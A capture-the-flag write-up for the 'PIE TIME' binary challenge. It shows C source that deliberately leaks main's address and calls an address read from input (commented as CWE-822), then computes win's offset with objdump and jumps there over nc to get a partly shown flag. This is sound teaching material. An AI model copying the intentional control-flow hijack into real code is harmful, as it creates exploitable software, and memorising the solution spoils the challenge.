PIE TIME
Can you try to get the flag? Beware we have PIE! Additional details will be available after launching your challenge instance.
We are given the following source, compiled with PIE (position-independent executable) enabled, so the code is loaded at a different base address on every run:
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
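/*
 * SIGSEGV handler: report a bad jump target and terminate with status 0.
 *
 * Only the async-signal-safe subset of libc may be called from a signal
 * handler (CERT SIG30-C); printf() and exit() are not on that list, so the
 * message is emitted with write() and the process ends with _exit().
 * main() puts stdout in unbuffered mode, so skipping exit()'s stdio flush
 * loses no output. The handler takes the signal number that signal() passes.
 */
void segfault_handler(int sig) {
    static const char msg[] = "Segfault Occurred, incorrect address.\n";
    (void)sig;
    (void)write(STDOUT_FILENO, msg, sizeof msg - 1);
    _exit(0);
}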
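/*
 * Target function for the challenge: prints "You won!" followed by the
 * contents of ./flag.txt. Returns 0 after the flag has been printed; if the
 * file cannot be opened it prints a message and exits the process with 0
 * (kept as in the original challenge).
 */
int win(void) {
    FILE *fptr;
    /* fgetc() returns an int so that EOF (-1) is out of band. Storing it in a
     * char either turns a 0xFF data byte into a false EOF (signed char) or
     * never matches EOF at all (unsigned char), so the loop variable is int. */
    int c;

    printf("You won!\n");

    fptr = fopen("flag.txt", "r");
    if (fptr == NULL) {
        printf("Cannot open file.\n");
        exit(0);
    }

    /* Copy the file byte-for-byte to stdout. */
    while ((c = fgetc(fptr)) != EOF) {
        putchar(c);
    }
    printf("\n");

    fclose(fptr);
    return 0;
}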
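/*
 * Challenge entry point. Leaks the runtime address of main(), reads an
 * address from stdin and jumps to it. The leak and the indirect call are the
 * intended vulnerabilities and are kept; only the unchecked scanf() is fixed.
 */
int main(void) {
    /* Turn a jump to a bad address into a friendly message instead of a core dump. */
    signal(SIGSEGV, segfault_handler);
    setvbuf(stdout, NULL, _IONBF, 0); /* _IONBF = unbuffered: every printf reaches the client at once */

    /* INTENTIONAL INFORMATION LEAK (the point of the challenge): printing a
     * code address reveals where the PIE image was loaded, and every other
     * function is at a fixed offset from it (win() is main - 0x96 in this build). */
    printf("Address of main: %p\n", &main);

    unsigned long val = 0;
    printf("Enter the address to jump to, ex => 0x12345: ");
    /* The original ignored scanf()'s result: on malformed input `val` was never
     * written and the indirect call below ran on an uninitialised value. */
    if (scanf("%lx", &val) != 1) {
        printf("Invalid address.\n");
        return 1;
    }
    printf("Your input: %lx\n", val);

    /* INTENTIONAL CONTROL-FLOW HIJACK (CWE-822): an attacker-chosen integer is
     * cast to a function pointer and called. With the leak above, PIE alone
     * does not prevent redirecting execution to win(). */
    void (*foo)(void) = (void (*)(void))val;
    foo();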
}
However, the program prints the runtime address of `main` before asking for input. PIE only randomises the base address the binary is loaded at; the distance between any two functions inside the image is fixed at link time, so a single leaked code address is enough to compute where `win` lives.
$ objdump -M intel -S vuln | grep main\>:
000000000000133d <main>:
$ objdump -M intel -S vuln | grep win\>:
00000000000012a7 <win>:
So in the binary `win` sits 0x133d − 0x12a7 = 0x96 bytes before `main`, and at runtime `win = (leaked main address) − 0x96`. The offsets must be read from the same `vuln` binary the server runs; a locally recompiled copy may place the functions differently.
$ nc rescued-float.picoctf.net 53312
Address of main: 0x64fa8620233d
Enter the address to jump to, ex => 0x12345: 0x64fa862022a7
Your input: 64fa862022a7
You won!
picoCTF{b4s1c...